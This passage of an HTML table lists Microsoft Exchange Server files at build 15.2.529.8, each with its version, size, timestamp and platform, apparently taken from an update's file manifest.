<td>15,440</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.owalog.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.perflog.dll</td><td>15.2.529.8</td><td>52,816</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.pfassistantlog.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.rca.dll</td><td>15.2.529.8</td><td>34,168</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.restlog.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.store.dll</td><td>15.2.529.8</td><td>19,016</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploader.dll</td><td>15.2.529.8</td><td>165,448</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.loguploaderproxy.dll</td><td>15.2.529.8</td><td>54,864</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.assistants.dll</td><td>15.2.529.8</td><td>9,055,608</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.attachmentthumbnail.dll</td><td>15.2.529.8</td><td>33,144</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.common.dll</td><td>15.2.529.8</td><td>124,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxassistants.crimsonevents.dll</td><td>15.2.529.8</td><td>82,808</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.eventlog.dll</td><td>15.2.529.8</td><td>14,416</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxassistants.rightsmanagement.dll</td><td>15.2.529.8</td><td>30,072</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.dll</td><td>15.2.529.8</td><td>661,376</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxloadbalance.serverstrings.dll</td><td>15.2.529.8</td><td>63,360</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll</td><td>15.2.529.8</td><td>175,480</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>15.2.529.8</td><td>2,791,808</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.complianceprovider.dll</td><td>15.2.529.8</td><td>53,112</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.contactsyncprovider.dll</td><td>15.2.529.8</td><td>151,928</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>15.2.529.8</td><td>966,520</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.easprovider.dll</td><td>15.2.529.8</td><td>185,424</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>15.2.529.8</td><td>31,616</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.googledocprovider.dll</td><td>15.2.529.8</td><td>39,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.imapprovider.dll</td><td>15.2.529.8</td><td>105,848</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.mapiprovider.dll</td><td>15.2.529.8</td><td>95,312</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.popprovider.dll</td><td>15.2.529.8</td><td>43,392</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>15.2.529.8</td><td>18,808</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyservice.dll</td><td>15.2.529.8</td><td>172,928</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.pstprovider.dll</td><td>15.2.529.8</td><td>102,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.remoteprovider.dll</td><td>15.2.529.8</td><td>98,920</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.storageprovider.dll</td><td>15.2.529.8</td><td>188,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.syncprovider.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xml.dll</td><td>15.2.529.8</td><td>447,352</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.xrmprovider.dll</td><td>15.2.529.8</td><td>90,184</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.monitoring.dll</td><td>15.2.529.8</td><td>107,904</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriveragents.dll</td><td>15.2.529.8</td><td>374,656</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedrivercommon.dll</td><td>15.2.529.8</td><td>193,920</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.dll</td><td>15.2.529.8</td><td>552,312</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll</td><td>15.2.529.8</td><td>16,248</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.eventlog.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.dll</td><td>15.2.529.8</td><td>321,400</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll</td><td>15.2.529.8</td><td>18,000</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxtransport.syncdelivery.dll</td><td>15.2.529.8</td><td>45,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.dll</td><td>15.2.529.8</td><td>18,296</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll</td><td>15.2.529.8</td><td>12,672</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.managedlexruntime.mppgruntime.dll</td><td>15.2.529.8</td><td>21,072</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.activedirectory.dll</td><td>15.2.529.8</td><td>415,096</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.classificationdefinitions.dll</td><td>15.2.529.8</td><td>1,269,840</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.compliancepolicy.dll</td><td>15.2.529.8</td><td>39,288</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.basics.dll</td><td>15.2.529.8</td><td>433,232</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>15.2.529.8</td><td>4,563,320</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanel.owaoptionstrings.dll</td><td>15.2.529.8</td><td>261,192</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>15.2.529.8</td><td>33,664</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.deployment.analysis.dll</td><td>15.2.529.8</td><td>94,080</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.dll</td><td>15.2.529.8</td><td>586,104</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.deployment.xml.dll</td><td>15.2.529.8</td><td>3,537,488</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>15.2.529.8</td><td>67,960</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>15.2.529.8</td><td>16,485,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>15.2.529.8</td><td>58,744</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.infrastructure.asynchronoustask.dll</td><td>15.2.529.8</td><td>23,928</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.jitprovisioning.dll</td><td>15.2.529.8</td><td>101,760</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.migration.dll</td><td>15.2.529.8</td><td>543,608</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.mobility.dll</td><td>15.2.529.8</td><td>305,016</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>15.2.529.8</td><td>273,992</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>15.2.529.8</td><td>418,920</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.provisioning.dll</td><td>15.2.529.8</td><td>275,832</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.psdirectinvoke.dll</td><td>15.2.529.8</td><td>70,520</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.rbacdefinition.dll</td><td>15.2.529.8</td><td>7,873,104</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.recipient.dll</td><td>15.2.529.8</td><td>1,501,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>15.2.529.8</td><td>71,544</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>15.2.529.8</td><td>1,238,904</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.transport.dll</td><td>15.2.529.8</td><td>1,877,584</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>15.2.529.8</td><td>5,366,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>15.2.529.8</td><td>36,216</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.mapihttpclient.dll</td><td>15.2.529.8</td><td>117,624</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.mapihttphandler.dll</td><td>15.2.529.8</td><td>207,952</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>15.2.529.8</td><td>79,944</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>15.2.529.8</td><td>17,272</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.dlppolicyagent.dll</td><td>15.2.529.8</td><td>156,232</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>15.2.529.8</td><td>65,912</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.eventlog.dll</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.filtering.dll</td><td>15.2.529.8</td><td>58,448</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.hygienerules.dll</td><td>15.2.529.8</td><td>29,768</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>15.2.529.8</td><td>175,696</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>15.2.529.8</td><td>28,544</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.retentionpolicyagent.dll</td><td>15.2.529.8</td><td>75,128</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>15.2.529.8</td><td>207,232</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>15.2.529.8</td><td>440,192</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.supervisoryreviewagent.dll</td><td>15.2.529.8</td><td>83,328</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>15.2.529.8</td><td>35,200</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unifiedpolicycommon.dll</td><td>15.2.529.8</td><td>53,112</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.unjournalagent.dll</td><td>15.2.529.8</td><td>96,632</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.migration.dll</td><td>15.2.529.8</td><td>1,110,120</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.migrationworkflowservice.eventlog.dll</td><td>15.2.529.8</td><td>14,720</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>15.2.529.8</td><td>135,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.activemonitoring.local.components.dll</td><td>15.2.529.8</td><td>5,065,592</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.servicecontextprovider.dll</td><td>15.2.529.8</td><td>20,048</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.mrsmlbconfiguration.dll</td><td>15.2.529.8</td><td>68,480</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>15.2.529.8</td><td>5,086,080</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.rightsmanagement.dll</td><td>15.2.529.8</td><td>265,592</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.networksettings.dll</td><td>15.2.529.8</td><td>37,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.notifications.broker.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.notifications.broker.exe</td><td>15.2.529.8</td><td>549,760</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>15.2.529.8</td><td>22,912</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabrequesthandler.dll</td><td>15.2.529.8</td><td>106,368</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.oauth.core.dll</td><td>15.2.529.8</td><td>291,920</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.objectstoreclient.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.configuration.dll</td><td>15.2.529.8</td><td>277,888</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.odata.dll</td><td>15.2.529.8</td><td>2,993,528</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.common.dll</td><td>15.2.529.8</td><td>90,496</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grain.dll</td><td>15.2.529.8</td><td>101,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graincow.dll</td><td>15.2.529.8</td><td>38,264</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graineventbasedassistants.dll</td><td>15.2.529.8</td><td>45,432</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.grainpropagationengine.dll</td><td>15.2.529.8</td><td>58,240</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransactionstorage.dll</td><td>15.2.529.8</td><td>147,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graintransportdeliveryagent.dll</td><td>15.2.529.8</td><td>26,496</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.graphstore.dll</td><td>15.2.529.8</td><td>184,192</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.permailboxkeys.dll</td><td>15.2.529.8</td><td>26,496</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondarycopyquotamanagement.dll</td><td>15.2.529.8</td><td>38,272</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.secondaryshallowcopylocation.dll</td><td>15.2.529.8</td><td>55,680</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.security.dll</td><td>15.2.529.8</td><td>147,536</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.semanticgraph.dll</td><td>15.2.529.8</td><td>191,872</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.officegraph.tasklogger.dll</td><td>15.2.529.8</td><td>33,664</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.partitioncache.dll</td><td>15.2.529.8</td><td>28,032</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.passivemonitoringsettings.dll</td><td>15.2.529.8</td><td>32,640</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.photogarbagecollectionservicelet.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll.fe</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>15.2.529.8</td><td>106,872</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.exe.fe</td><td>15.2.529.8</td><td>106,872</td><td>01-Jan-2020</td><td>11:23</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:23</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe.fe</td><td>15.2.529.8</td><td>25,160</td><td>01-Jan-2020</td><td>11:23</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popconfiguration.dl1</td><td>15.2.529.8</td><td>42,880</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>15.2.529.8</td><td>264,568</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll.fe</td><td>15.2.529.8</td><td>264,568</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.powersharp.dll</td><td>15.2.529.8</td><td>358,264</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.powersharp.management.dll</td><td>15.2.529.8</td><td>4,164,992</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>15.2.529.8</td><td>308,600</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>15.2.529.8</td><td>41,568</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>15.2.529.8</td><td>30,584</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.fasttransfer.dll</td><td>15.2.529.8</td><td>137,088</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.protocols.mapi.dll</td><td>15.2.529.8</td><td>441,928</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioning.eventlog.dll</td><td>15.2.529.8</td><td>14,432</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>15.2.529.8</td><td>224,848</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningservicelet.dll</td><td>15.2.529.8</td><td>106,064</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>15.2.529.8</td><td>169,040</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.pst.dll.deploy</td><td>15.2.529.8</td><td>169,040</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.pswsclient.dll</td><td>15.2.529.8</td><td>259,664</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.publicfolders.dll</td><td>15.2.529.8</td><td>72,056</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.crimsonevents.dll</td><td>15.2.529.8</td><td>215,928</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.pushnotifications.dll</td><td>15.2.529.8</td><td>106,872</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.publishers.dll</td><td>15.2.529.8</td><td>425,848</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.pushnotifications.server.dll</td><td>15.2.529.8</td><td>70,528</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.analysis.dll</td><td>15.2.529.8</td><td>46,672</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.configuration.dll</td><td>15.2.529.8</td><td>215,936</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.core.dll</td><td>15.2.529.8</td><td>168,312</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.ranking.dll</td><td>15.2.529.8</td><td>343,424</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.retrieval.dll</td><td>15.2.529.8</td><td>174,456</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.query.suggestions.dll</td><td>15.2.529.8</td><td>95,312</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.realtimeanalyticspublisherservicelet.dll</td><td>15.2.529.8</td><td>127,560</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.core.dll</td><td>15.2.529.8</td><td>63,568</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.data.dll</td><td>15.2.529.8</td><td>36,936</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.mailtagger.dll</td><td>15.2.529.8</td><td>17,992</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.people.dll</td><td>15.2.529.8</td><td>9,666,944</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.peopleindex.dll</td><td>15.2.529.8</td><td>20,788,088</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.peopleranker.dll</td><td>15.2.529.8</td><td>36,728</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.relevance.perm.dll</td><td>15.2.529.8</td><td>97,872</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.sassuggest.dll</td><td>15.2.529.8</td><td>28,536</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.relevance.upm.dll</td><td>15.2.529.8</td><td>72,264</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.client.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.routing.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.routing.server.exe</td><td>15.2.529.8</td><td>59,472</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>15.2.529.8</td><td>1,647,200</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>15.2.529.8</td><td>207,232</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>15.2.529.8</td><td>60,512</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>15.2.529.8</td><td>518,016</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.monitoring.dll</td><td>15.2.529.8</td><td>161,144</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>15.2.529.8</td><td>724,344</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>15.2.529.8</td><td>234,872</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Micr